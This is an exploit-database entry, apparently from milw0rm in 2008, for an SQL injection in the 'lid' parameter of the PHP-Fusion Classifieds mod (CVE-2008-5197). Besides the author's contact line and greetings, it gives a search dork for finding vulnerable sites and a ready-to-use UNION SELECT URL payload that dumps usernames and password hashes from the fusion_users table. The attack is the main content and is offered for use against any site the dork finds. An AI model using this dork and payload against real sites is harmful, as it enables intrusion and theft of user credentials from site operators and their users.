PHP-Fusion Mod Classifieds - 'lid' SQL Injection

EKU-ID: 13888	CVE: OSVDB-50130;CVE-2008-5197	OSVDB-ID:
Author: boom3rang	Published: 2008-06-27	Verified:
Download:

Rating

☆☆☆☆☆

#################################
Php fusion "classifieds"  SQL-injetion
#################################

++++++++++++++++++++++++++++
Author     :     boom3rang
contact     :    boomerang [at] knaqu-shqipe [dot] de
webpage  :  www.khg-crew.ws
++++++++++++++++++++++++++++



----> Remote SQL Injection <------


[+] Dork:                     inurl:"classifieds.php?op=detail_adverts"


[+] Example:  www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid= [SQL]



exploit:
www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid=-9999+union+all+select+1,user_name,user_password,4,5,6,null,null+from+fusion_users--



##########################################
  greetz to:   All my albanian brothers
     =United State of Albania =
##########################################

# milw0rm.com [2008-06-27]